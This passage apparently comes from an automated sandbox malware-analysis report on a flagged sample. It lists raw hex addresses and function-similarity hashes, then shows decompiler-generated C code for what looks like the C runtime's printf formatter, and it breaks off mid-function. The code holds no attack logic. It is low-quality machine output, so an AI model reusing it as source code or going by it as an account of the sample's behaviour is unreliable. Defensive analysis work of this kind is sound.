    0x00b966e6
    0x00b966f8
    0x00b966f8
    0x00b966f8
    0x00b966fb
    0x00b96701
    0x00000000
    0x00000000
    0x00b96703
    0x00b96703
    0x00b96709
    0x00b9670c
    0x00b9670e
    0x00000000
    0x00000000
    0x00b96710
    0x00b96710
    0x00b96719
    0x00b9671f
    0x00b96723
    0x00b9672b
    0x00b9672d
    0x00b9672f
    0x00b96735
    0x00b96735
    0x00b96738
    0x00b96738
    0x00b96744
    0x00b96747
    0x00b966ef
    0x00b966f2
    0x00b966f2
    0x00b966f5
    0x00b966f5
    0x00b9674f
    0x00b967b5
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00000000
    0x00b96a6d
    0x00b96a6d
    0x00b96ae2
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00000000
    0x00000000
    0x00000000
    0x00b96bbe
    0x00000000
    0x00b96a89
    0x00b96a89
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00b96ae2
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00000000
    0x00000000
    0x00000000
    0x00b96bbe
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00000000
    0x00b962f9
    0x00b962f9
    0x00b962fc
    0x00b962ff
    0x00000000
    0x00000000
    0x00b96304
    0x00b96307
    0x00b9630d
    0x00000000
    0x00000000
    0x00b962ee
    0x00b962f1
    0x00b962f4
    0x00000000
    0x00000000
    0x00b962e3
    0x00b962e6
    0x00b962e9
    0x00000000
    0x00000000
    0x00b96312
    0x00b96312
    0x00b96315
    0x00b96315
    0x00b96318
    0x00000000
    0x00000000
    0x00b9631b
    0x00000000
    0x00000000
    0x00b9618b
    0x00b9618b
    0x00b9618d
    0x00b9619b
    0x00b9618f
    0x00b9618f
    0x00b9618f
    0x00b961ab
    0x00b961b8
    0x00b961ba
    0x00b961bf
    0x00b961c1
    0x00b961c6
    0x00b961cb
    0x00b961cd
    0x00b961d2
    0x00b961d8
    0x00b961da
    0x00b961da
    0x00b961d8
    0x00b961db
    0x00b961e2
    0x00000000
    0x00b961e4
    0x00b961e9
    0x00b96205
    0x00b9620d
    0x00b9621a
    0x00b9621f
    0x00b97034
    0x00b97041
    0x00b97041
    0x00b961e2
    0x00b96185
    0x00b96f70
    0x00b96f70
    0x00b96f77
    0x00b96f8e
    0x00b96f8e
    0x00b96f98
    0x00b96f98
    0x00b96f9e
    0x00b96fa4
    0x00b96fab
    0x00b96fad
    0x00b96fb2
    0x00b96fb4
    0x00b96fb9
    0x00b96fbe
    0x00b96fc0
    0x00b96fc5
    0x00b96fc8
    0x00b96fcb
    0x00b96fcd
    0x00b96fcd
    0x00b96fcb
    0x00b96fce
    0x00b96fd5
    0x00b97020
    0x00b97029
    0x00b9702e
    0x00b96fd7
    0x00b96fdc
    0x00b96ff8
    0x00b97000
    0x00b9700d
    0x00b97012
    0x00b97012
    0x00000000
    0x00b96fd5
    0x00b96f79
    0x00b96f79
    0x00b96f80
    0x00000000
    0x00000000
    0x00b96f82
    0x00b96f82
    0x00000000
    0x00b96f82
    0x00b96d70
    0x00b96d47
    0x00b96d47
    0x00b96d4b
    0x00b96d58
    0x00b96d5b
    0x00b96d5e
    0x00b96d61
    0x00b96d64
    0x00b96d67
    0x00b96d6a
    0x00b96d6a
    0x00b96d6d
    0x00000000
    0x00b96d6d
    0x00b96d4d
    0x00b96d4d
    0x00b96d50
    0x00b96d53
    0x00b96d56
    0x00000000
    0x00000000
    0x00000000
    0x00b96d56
    0x00b96cac
    0x00b96cac
    0x00b96caf
    0x00b96cb2
    0x00b96cb9
    0x00b96cc0
    0x00b96cc8
    0x00b96cce
    0x00b96cd1
    0x00b96cd4
    0x00b96cdb
    0x00b96ce7
    0x00b96ced
    0x00b96cf3
    0x00b96cfa
    0x00b96cfc
    0x00b96d02
    0x00b96d02
    0x00b96d08
    0x00b96d08
    0x00b96d0e
    0x00b96d17
    0x00b96d1c
    0x00b96d1f
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00000000
    0x00b96c9c
    0x00b96c8e
    0x00b96bcb
    0x00b96bcb
    0x00b96bd2
    0x00000000
    0x00000000
    0x00000000
    0x00b96c00
    0x00b96c00
    0x00b96c06
    0x00b96c0c
    0x00b96c12
    0x00000000
    0x00b96c12
    0x00b96ae2
    0x00b96a93
    0x00b96a7d

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __aulldiv__aullrem_get_int64_arg
    • String ID: 9
    • API String ID: 3120068967-2366072709
    • Opcode ID: e4a718f8682224933c29800a7b4d73113a8892c4c9a4d370997bf5c4ab0103cd
    • Instruction ID: 5bcae7cf2ea4e196f02d64da30b78dc3416f26e2345c5debc9fed8dcbca2ffdc
    • Opcode Fuzzy Hash: e4a718f8682224933c29800a7b4d73113a8892c4c9a4d370997bf5c4ab0103cd
    • Instruction Fuzzy Hash: B641D2B1E106299FDF24CF58C881BAEB7B5FF85314F1041E8E189AB241D7749A84CF59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __aulldiv__aullrem_get_int64_arg
    • String ID: 9
    • API String ID: 3120068967-2366072709
    • Opcode ID: 8afe1225593388a94f1002279619d41a385deb8ec489c5aff2d7c33724165833
    • Instruction ID: 6eb40f7c6641b4e68a2cd2dc33d9e6b387743079a76ae9db8a071dc4745d340e
    • Opcode Fuzzy Hash: 8afe1225593388a94f1002279619d41a385deb8ec489c5aff2d7c33724165833
    • Instruction Fuzzy Hash: 9341C3B1E105299FDF24CF58C981BAEB7B5FB85310F1081E8E189AB241D7349A80CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E00B9574C() {
    				signed int _t496;
    				signed int _t518;
    				void* _t523;
    				signed int _t525;
    				void* _t545;
    				signed int _t563;
    				signed int _t576;
    				signed int _t580;
    				signed short _t581;
    				signed int _t584;
    				signed int _t587;
    				signed int _t588;
    				intOrPtr _t589;
    				signed int _t611;
    				signed int _t639;
    				signed int _t647;
    				signed int _t649;
    				signed int _t651;
    				signed int _t658;
    				signed int _t662;
    				signed int _t698;
    				intOrPtr _t699;
    				intOrPtr _t700;
    				signed int _t701;
    				void* _t703;
    
    				L0:
    				while(1) {
    					L0:
    					 *(_t701 - 8) = 8;
    					if(( *(_t701 - 0x10) & 0x00000080) != 0) {
    						__edx =  *(__ebp - 0x10);
    						__edx =  *(__ebp - 0x10) | 0x00000200;
    						__eflags = __edx;
    						 *(__ebp - 0x10) = __edx;
    					}
    					while(1) {
    						L153:
    						__eflags =  *(_t701 - 0x10) & 0x00008000;
    						if(( *(_t701 - 0x10) & 0x00008000) == 0) {
    							_t649 =  *(_t701 - 0x10) & 0x00001000;
    							__eflags = _t649;
    							if(_t649 == 0) {
    								__eflags =  *(_t701 - 0x10) & 0x00000020;
    								if(( *(_t701 - 0x10) & 0x00000020) == 0) {
    									_t651 =  *(_t701 - 0x10) & 0x00000040;
    									__eflags = _t651;
    									if(_t651 == 0) {
    										_t496 = E00B93D50(_t701 + 0x14);
    										_t703 = _t703 + 4;
    										__eflags = 0;
    										 *(_t701 - 0x2b8) = _t496;
    										 *(_t701 - 0x2b4) = 0;
    									} else {
    										_t580 = E00B93D50(_t701 + 0x14);
    										_t703 = _t703 + 4;
    										asm("cdq");
    										 *(_t701 - 0x2b8) = _t580;
    										 *(_t701 - 0x2b4) = _t651;
    									}
    								} else {
    									_t698 =  *(_t701 - 0x10) & 0x00000040;
    									__eflags = _t698;
    									if(_t698 == 0) {
    										_t581 = E00B93D50(_t701 + 0x14);
    										_t703 = _t703 + 4;
    										asm("cdq");
    										 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
    										 *(_t701 - 0x2b4) = _t698;
    									} else {
    										_t584 = E00B93D50(_t701 + 0x14);
    										_t703 = _t703 + 4;
    										asm("cdq");
    										 *(_t701 - 0x2b8) = _t584;
    										 *(_t701 - 0x2b4) = _t698;
    									}
    								}
    							} else {
    								_t587 = E00B93D70(_t701 + 0x14);
    								_t703 = _t703 + 4;
    								 *(_t701 - 0x2b8) = _t587;
    								 *(_t701 - 0x2b4) = _t649;
    							}
    						} else {
    							_t588 = E00B93D70(_t701 + 0x14);
    							_t703 = _t703 + 4;
    							 *(_t701 - 0x2b8) = _t588;
    							 *(_t701 - 0x2b4) = _t647;
    						}
    						__eflags =  *(_t701 - 0x10) & 0x00000040;
    						if(( *(_t701 - 0x10) & 0x00000040) == 0) {
    							goto L170;
    						}
    						L166:
    						__eflags =  *(_t701 - 0x2b4);
    						if(__eflags > 0) {
    							goto L170;
    						}
    						L167:
    						if(__eflags < 0) {
    							L169:
    							asm("adc edx, 0x0");
    							 *(_t701 - 0x2c0) =  ~( *(_t701 - 0x2b8));
    							 *(_t701 - 0x2bc) =  ~( *(_t701 - 0x2b4));
    							 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000100;
    							L171:
    							__eflags =  *(_t701 - 0x10) & 0x00008000;
    							if(( *(_t701 - 0x10) & 0x00008000) == 0) {
    								__eflags =  *(_t701 - 0x10) & 0x00001000;
    								if(( *(_t701 - 0x10) & 0x00001000) == 0) {
    									_t576 =  *(_t701 - 0x2bc) & 0x00000000;
    									__eflags = _t576;
    									 *(_t701 - 0x2bc) = _t576;
    								}
    							}
    							__eflags =  *(_t701 - 0x30);
    							if( *(_t701 - 0x30) >= 0) {
    								 *(_t701 - 0x10) =  *(_t701 - 0x10) & 0xfffffff7;
    								__eflags =  *(_t701 - 0x30) - 0x200;
    								if( *(_t701 - 0x30) > 0x200) {
    									 *(_t701 - 0x30) = 0x200;
    								}
    							} else {
    								 *(_t701 - 0x30) = 1;
    							}
    							__eflags =  *(_t701 - 0x2c0) |  *(_t701 - 0x2bc);
    							if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
    								 *(_t701 - 0x1c) = 0;
    							}
    							 *((intOrPtr*)(_t701 - 4)) = _t701 - 0x49;
    							while(1) {
    								L181:
    								_t657 =  *(_t701 - 0x30) - 1;
    								 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
    								__eflags =  *(_t701 - 0x30);
    								if( *(_t701 - 0x30) > 0) {
    									goto L183;
    								}
    								L182:
    								__eflags =  *(_t701 - 0x2c0) |  *(_t701 - 0x2bc);
    								if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
    									L186:
    									 *(_t701 - 0x24) = _t701 - 0x49 -  *((intOrPtr*)(_t701 - 4));
    									 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) + 1;
    									__eflags =  *(_t701 - 0x10) & 0x00000200;
    									if(( *(_t701 - 0x10) & 0x00000200) == 0) {
    										while(1) {
    											L190:
    											__eflags =  *(_t701 - 0x28);
    											if( *(_t701 - 0x28) != 0) {
    												goto L216;
    											}
    											L191:
    											__eflags =  *(_t701 - 0x10) & 0x00000040;
    											if(( *(_t701 - 0x10) & 0x00000040) != 0) {
    												__eflags =  *(_t701 - 0x10) & 0x00000100;
    												if(( *(_t701 - 0x10) & 0x00000100) == 0) {
    													__eflags =  *(_t701 - 0x10) & 0x00000001;
    													if(( *(_t701 - 0x10) & 0x00000001) == 0) {
    														__eflags =  *(_t701 - 0x10) & 0x00000002;
    														if(( *(_t701 - 0x10) & 0x00000002) != 0) {
    															 *((char*)(_t701 - 0x14)) = 0x20;
    															 *(_t701 - 0x1c) = 1;
    														}
    													} else {
    														 *((char*)(_t701 - 0x14)) = 0x2b;
    														 *(_t701 - 0x1c) = 1;
    													}
    												} else {
    													 *((char*)(_t701 - 0x14)) = 0x2d;
    													 *(_t701 - 0x1c) = 1;
    												}
    											}
    											 *((intOrPtr*)(_t701 - 0x2c4)) =  *((intOrPtr*)(_t701 - 0x18)) -  *(_t701 - 0x24) -  *(_t701 - 0x1c);
    											__eflags =  *(_t701 - 0x10) & 0x0000000c;
    											if(( *(_t701 - 0x10) & 0x0000000c) == 0) {
    												E00B95E80(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    												_t703 = _t703 + 0x10;
    											}
    											E00B95EC0( *(_t701 - 0x1c), _t701 - 0x14,  *(_t701 - 0x1c),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    											_t703 = _t703 + 0x10;
    											__eflags =  *(_t701 - 0x10) & 0x00000008;
    											if(( *(_t701 - 0x10) & 0x00000008) != 0) {
    												__eflags =  *(_t701 - 0x10) & 0x00000004;
    												if(( *(_t701 - 0x10) & 0x00000004) == 0) {
    													E00B95E80(0x30,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    													_t703 = _t703 + 0x10;
    												}
    											}
    											__eflags =  *(_t701 - 0xc);
    											if( *(_t701 - 0xc) == 0) {
    												L212:
    												E00B95EC0( *((intOrPtr*)(_t701 - 4)),  *((intOrPtr*)(_t701 - 4)),  *(_t701 - 0x24),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    												_t703 = _t703 + 0x10;
    												goto L213;
    											} else {
    												L204:
    												__eflags =  *(_t701 - 0x24);
    												if( *(_t701 - 0x24) <= 0) {
    													goto L212;
    												}
    												L205:
    												 *(_t701 - 0x2dc) = 0;
    												 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 4));
    												 *(_t701 - 0x2cc) =  *(_t701 - 0x24);
    												while(1) {
    													L206:
    													 *(_t701 - 0x2cc) =  *(_t701 - 0x2cc) - 1;
    													__eflags =  *(_t701 - 0x2cc);
    													if( *(_t701 - 0x2cc) == 0) {
    														break;
    													}
    													L207:
    													 *(_t701 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t701 - 0x2c8))));
    													_t563 = E00B97890(_t701 - 0x2d0, _t701 - 0x2d8, 6,  *(_t701 - 0x32e) & 0x0000ffff);
    													_t703 = _t703 + 0x10;
    													 *(_t701 - 0x2dc) = _t563;
    													 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 0x2c8)) + 2;
    													__eflags =  *(_t701 - 0x2dc);
    													if( *(_t701 - 0x2dc) != 0) {
    														L209:
    														 *(_t701 - 0x24c) = 0xffffffff;
    														break;
    													}
    													L208:
    													__eflags =  *(_t701 - 0x2d0);
    													if( *(_t701 - 0x2d0) != 0) {
    														L210:
    														E00B95EC0( *((intOrPtr*)(_t701 + 8)), _t701 - 0x2d8,  *(_t701 - 0x2d0),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    														_t703 = _t703 + 0x10;
    														continue;
    													}
    													goto L209;
    												}
    												L211:
    												L213:
    												__eflags =  *(_t701 - 0x24c);
    												if( *(_t701 - 0x24c) >= 0) {
    													__eflags =  *(_t701 - 0x10) & 0x00000004;
    													if(( *(_t701 - 0x10) & 0x00000004) != 0) {
    														E00B95E80(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    														_t703 = _t703 + 0x10;
    													}
    												}
    											}
    											L216:
    											__eflags =  *(_t701 - 0x20);
    											if( *(_t701 - 0x20) != 0) {
    												L00B7EB20( *(_t701 - 0x20), 2);
    												_t703 = _t703 + 8;
    												 *(_t701 - 0x20) = 0;
    											}
    											while(1) {
    												L218:
    												 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
    												_t665 =  *(_t701 - 0x251);
    												 *(_t701 + 0xc) =  *(_t701 + 0xc) + 1;
    												if( *(_t701 - 0x251) == 0 ||  *(_t701 - 0x24c) < 0) {
    													break;
    												} else {
    													if( *(_t701 - 0x251) < 0x20 ||  *(_t701 - 0x251) > 0x78) {
    														 *(_t701 - 0x310) = 0;
    													} else {
    														 *(_t701 - 0x310) =  *( *(_t701 - 0x251) +  &M00B77B58) & 0xf;
    													}
    												}
    												L7:
    												 *(_t701 - 0x250) =  *(_t701 - 0x310);
    												_t525 =  *(_t701 - 0x250) * 9;
    												_t611 =  *(_t701 - 0x25c);
    												_t665 = ( *(_t525 + _t611 + 0xb77b78) & 0x000000ff) >> 4;
    												 *(_t701 - 0x25c) = ( *(_t525 + _t611 + 0xb77b78) & 0x000000ff) >> 4;
    												if( *(_t701 - 0x25c) != 8) {
    													L16:
    													 *(_t701 - 0x318) =  *(_t701 - 0x25c);
    													__eflags =  *(_t701 - 0x318) - 7;
    													if( *(_t701 - 0x318) > 7) {
    														continue;
    													}
    													L17:
    													switch( *((intOrPtr*)( *(_t701 - 0x318) * 4 +  &M00B95CD0))) {
    														case 0:
    															L18:
    															 *(_t701 - 0xc) = 0;
    															_t528 = E00B91090( *(_t701 - 0x251) & 0x000000ff, E00B7C680(_t701 - 0x40));
    															_t706 = _t703 + 8;
    															__eflags = _t528;
    															if(_t528 == 0) {
    																L24:
    																E00B95DE0( *(_t701 - 0x251) & 0x000000ff,  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																_t703 = _t706 + 0xc;
    																goto L218;
    															} else {
    																E00B95DE0( *((intOrPtr*)(_t701 + 8)),  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																_t706 = _t706 + 0xc;
    																_t616 =  *( *(_t701 + 0xc));
    																 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
    																_t665 =  *(_t701 + 0xc) + 1;
    																__eflags = _t665;
    																 *(_t701 + 0xc) = _t665;
    																asm("sbb eax, eax");
    																 *(_t701 - 0x27c) =  ~( ~( *(_t701 - 0x251)));
    																if(_t665 == 0) {
    																	_push(L"(ch != _T(\'\\0\'))");
    																	_push(0);
    																	_push(0x486);
    																	_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																	_push(2);
    																	_t540 = L00B7D760();
    																	_t706 = _t706 + 0x14;
    																	__eflags = _t540 - 1;
    																	if(_t540 == 1) {
    																		asm("int3");
    																	}
    																}
    																L22:
    																__eflags =  *(_t701 - 0x27c);
    																if( *(_t701 - 0x27c) != 0) {
    																	goto L24;
    																} else {
    																	 *((intOrPtr*)(L00B80C60(_t616))) = 0x16;
    																	E00B809F0(_t589, _t616, _t699, _t700, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
    																	 *(_t701 - 0x2f4) = 0xffffffff;
    																	E00B7C650(_t701 - 0x40);
    																	_t518 =  *(_t701 - 0x2f4);
    																	goto L229;
    																}
    															}
    														case 1:
    															L25:
    															 *(__ebp - 0x2c) = 0;
    															__edx =  *(__ebp - 0x2c);
    															 *(__ebp - 0x28) =  *(__ebp - 0x2c);
    															__eax =  *(__ebp - 0x28);
    															 *(__ebp - 0x18) =  *(__ebp - 0x28);
    															__ecx =  *(__ebp - 0x18);
    															 *(__ebp - 0x1c) = __ecx;
    															 *(__ebp - 0x10) = 0;
    															 *(__ebp - 0x30) = 0xffffffff;
    															 *(__ebp - 0xc) = 0;
    															goto L218;
    														case 2:
    															L26:
    															__edx =  *((char*)(__ebp - 0x251));
    															 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
    															 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    															 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    															__eflags =  *(__ebp - 0x31c) - 0x10;
    															if( *(__ebp - 0x31c) > 0x10) {
    																goto L33;
    															}
    															L27:
    															__ecx =  *(__ebp - 0x31c);
    															_t73 = __ecx + 0xb95d08; // 0x498d04
    															__edx =  *_t73 & 0x000000ff;
    															switch( *((intOrPtr*)(( *_t73 & 0x000000ff) * 4 +  &M00B95CF0))) {
    																case 0:
    																	goto L30;
    																case 1:
    																	goto L31;
    																case 2:
    																	goto L29;
    																case 3:
    																	goto L28;
    																case 4:
    																	goto L32;
    																case 5:
    																	goto L33;
    															}
    														case 3:
    															L34:
    															__edx =  *((char*)(__ebp - 0x251));
    															__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    															if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																__eax =  *(__ebp - 0x18);
    																__eax =  *(__ebp - 0x18) * 0xa;
    																__eflags = __eax;
    																__ecx =  *((char*)(__ebp - 0x251));
    																_t97 = __ecx - 0x30; // -48
    																__edx = __eax + _t97;
    																 *(__ebp - 0x18) = __eax + _t97;
    															} else {
    																__eax = __ebp + 0x14;
    																 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																__eflags =  *(__ebp - 0x18);
    																if( *(__ebp - 0x18) < 0) {
    																	__ecx =  *(__ebp - 0x10);
    																	__ecx =  *(__ebp - 0x10) | 0x00000004;
    																	__eflags = __ecx;
    																	 *(__ebp - 0x10) = __ecx;
    																	 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																	 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																}
    															}
    															goto L218;
    														case 4:
    															L40:
    															 *(__ebp - 0x30) = 0;
    															goto L218;
    														case 5:
    															L41:
    															__eax =  *((char*)(__ebp - 0x251));
    															__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    															if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																__edx =  *(__ebp - 0x30);
    																__edx =  *(__ebp - 0x30) * 0xa;
    																__eflags = __edx;
    																_t108 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
    																__ecx = __edx + _t108;
    																 *(__ebp - 0x30) = __ecx;
    															} else {
    																__ecx = __ebp + 0x14;
    																 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) < 0) {
    																	 *(__ebp - 0x30) = 0xffffffff;
    																}
    															}
    															goto L218;
    														case 6:
    															L47:
    															__edx =  *((char*)(__ebp - 0x251));
    															 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
    															 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    															 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    															__eflags =  *(__ebp - 0x320) - 0x2e;
    															if( *(__ebp - 0x320) > 0x2e) {
    																L70:
    																goto L218;
    															}
    															L48:
    															__ecx =  *(__ebp - 0x320);
    															_t116 = __ecx + 0xb95d30; // 0x553e9003
    															__edx =  *_t116 & 0x000000ff;
    															switch( *((intOrPtr*)(( *_t116 & 0x000000ff) * 4 +  &M00B95D1C))) {
    																case 0:
    																	L53:
    																	__edx =  *(__ebp + 0xc);
    																	__eax =  *( *(__ebp + 0xc));
    																	__eflags =  *( *(__ebp + 0xc)) - 0x36;
    																	if( *( *(__ebp + 0xc)) != 0x36) {
    																		L56:
    																		__edx =  *(__ebp + 0xc);
    																		__eax =  *( *(__ebp + 0xc));
    																		__eflags =  *( *(__ebp + 0xc)) - 0x33;
    																		if( *( *(__ebp + 0xc)) != 0x33) {
    																			L59:
    																			__edx =  *(__ebp + 0xc);
    																			__eax =  *( *(__ebp + 0xc));
    																			__eflags =  *( *(__ebp + 0xc)) - 0x64;
    																			if( *( *(__ebp + 0xc)) == 0x64) {
    																				L65:
    																				L67:
    																				goto L70;
    																			}
    																			L60:
    																			__ecx =  *(__ebp + 0xc);
    																			__edx =  *__ecx;
    																			__eflags =  *__ecx - 0x69;
    																			if( *__ecx == 0x69) {
    																				goto L65;
    																			}
    																			L61:
    																			__eax =  *(__ebp + 0xc);
    																			__ecx =  *( *(__ebp + 0xc));
    																			__eflags = __ecx - 0x6f;
    																			if(__ecx == 0x6f) {
    																				goto L65;
    																			}
    																			L62:
    																			__edx =  *(__ebp + 0xc);
    																			__eax =  *( *(__ebp + 0xc));
    																			__eflags =  *( *(__ebp + 0xc)) - 0x75;
    																			if( *( *(__ebp + 0xc)) == 0x75) {
    																				goto L65;
    																			}
    																			L63:
    																			__ecx =  *(__ebp + 0xc);
    																			__edx =  *__ecx;
    																			__eflags =  *__ecx - 0x78;
    																			if( *__ecx == 0x78) {
    																				goto L65;
    																			}
    																			L64:
    																			__eax =  *(__ebp + 0xc);
    																			__ecx =  *( *(__ebp + 0xc));
    																			__eflags = __ecx - 0x58;
    																			if(__ecx != 0x58) {
    																				 *(__ebp - 0x25c) = 0;
    																				goto L18;
    																			}
    																			goto L65;
    																		}
    																		L57:
    																		__ecx =  *(__ebp + 0xc);
    																		__edx =  *((char*)(__ecx + 1));
    																		__eflags =  *((char*)(__ecx + 1)) - 0x32;
    																		if( *((char*)(__ecx + 1)) != 0x32) {
    																			goto L59;
    																		} else {
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) & 0xffff7fff;
    																			 *(__ebp - 0x10) = __ecx;
    																			goto L67;
    																		}
    																	}
    																	L54:
    																	__ecx =  *(__ebp + 0xc);
    																	__edx =  *((char*)(__ecx + 1));
    																	__eflags =  *((char*)(__ecx + 1)) - 0x34;
    																	if( *((char*)(__ecx + 1)) != 0x34) {
    																		goto L56;
    																	} else {
    																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																		__ecx =  *(__ebp - 0x10);
    																		__ecx =  *(__ebp - 0x10) | 0x00008000;
    																		 *(__ebp - 0x10) = __ecx;
    																		goto L67;
    																	}
    																case 1:
    																	L68:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																	goto L70;
    																case 2:
    																	L49:
    																	__eax =  *(__ebp + 0xc);
    																	__ecx =  *( *(__ebp + 0xc));
    																	__eflags = __ecx - 0x6c;
    																	if(__ecx != 0x6c) {
    																		__ecx =  *(__ebp - 0x10);
    																		__ecx =  *(__ebp - 0x10) | 0x00000010;
    																		__eflags = __ecx;
    																		 *(__ebp - 0x10) = __ecx;
    																	} else {
    																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
